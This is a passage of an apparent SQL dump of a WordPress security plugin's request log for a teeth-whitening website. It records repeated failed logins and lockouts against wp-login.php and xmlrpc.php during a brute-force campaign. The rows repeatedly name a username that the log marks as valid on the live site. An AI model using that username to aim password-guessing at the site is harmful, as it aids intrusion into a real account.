\'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7038,0.000000,1629290129.162746,'\0\0\0\0\0\0\0\0\0\0���@wP',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7039,1629290760.351923,1629290760.241400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7040,1629290759.773592,1629290759.691600,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7041,1629290682.119146,1629290682.045300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7042,1629290681.618104,1629290681.535700,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7043,1629290347.017127,1629290346.814300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7044,1629290346.440593,1629290346.357700,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7045,1629290180.750221,1629290180.636600,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7046,1629290180.267146,1629290180.146000,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7047,0.000000,1629290821.047622,'\0\0\0\0\0\0\0\0\0\0��k�;�',0,200,0,0,0,'https://www.teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(7048,1629290852.513858,1629290852.428400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7049,1629290851.390900,1629290851.309300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7050,0.000000,1629290942.528157,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7051,0.000000,1629291242.291676,'\0\0\0\0\0\0\0\0\0\0���֖Y',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7052,1629291269.757676,1629291269.686300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7053,1629291269.264649,1629291269.062600,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7054,1629291403.535557,1629291403.463000,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7055,1629291403.137650,1629291403.020500,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7056,0.000000,1629291686.164103,'\0\0\0\0\0\0\0\0\0\0���\0�[',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7057,0.000000,1629292011.975848,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7058,1629292210.491693,1629292210.387400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7059,1629292209.954837,1629292209.873800,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7060,1629292143.749062,1629292143.677600,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7061,1629292143.318664,1629292143.234500,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7062,1629292841.103294,1629292840.996600,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7063,1629292840.629951,1629292840.559100,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7064,0.000000,1629292841.311960,'\0\0\0\0\0\0\0\0\0\0���kS�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7065,1629293144.752315,1629293144.680800,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7066,1629293144.307674,1629293144.224400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7067,0.000000,1629293228.100232,'\0\0\0\0\0\0\0\0\0\0��H\"\"�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7068,1629293249.983277,1629293249.850100,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7069,1629293249.366972,1629293249.288700,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7070,1629293424.287496,1629293424.214500,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7071,1629293423.866139,1629293423.479200,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7072,1629293631.814566,1629293631.734900,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7073,1629293631.305713,1629293631.224300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7074,0.000000,1629293641.586436,'\0\0\0\0\0\0\0\0\0\0��^+.',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7075,0.000000,1629294021.037208,'\0\0\0\0\0\0\0\0\0\0��\rQ(',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7076,1629294021.549176,1629294021.475500,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7077,1629294021.105482,1629294021.023900,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7078,1629294387.009963,1629294386.940600,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7079,1629294386.613877,1629294386.531600,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7080,0.000000,1629294409.562658,'\0\0\0\0\0\0\0\0\0\0��H�%�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7081,1629294522.612767,1629294522.540200,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7082,1629294522.173920,1629294522.045800,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7083,0.000000,1629294766.986045,'\0\0\0\0\0\0\0\0\0\0��@�2�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7084,0.000000,1629295200.854434,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7085,1629295571.509816,1629295571.439400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7086,1629295571.063854,1629295570.985800,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7087,1629295442.015246,1629295441.935500,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7088,1629295441.581080,1629295441.500800,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7089,1629295352.862008,1629295352.788800,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7090,1629295351.700703,1629295351.616600,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7091,1629295237.501283,1629295237.422900,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7092,1629295236.365827,1629295236.282000,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7093,0.000000,1629295575.136715,'\0\0\0\0\0\0\0\0\0\0���֣%',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7094,1629295800.188501,1629295800.116000,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7095,1629295799.524476,1629295799.442600,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7096,0.000000,1629295929.155915,'\0\0\0\0\0\0\0\0\0\0���A�-',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7097,1629296175.803013,1629296175.727300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7098,1629296175.407976,1629296175.325300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7099,0.000000,1629296375.398035,'\0\0\0\0\0\0\0\0\0\0���\n�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7100,1629296539.151220,1629296539.042200,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: 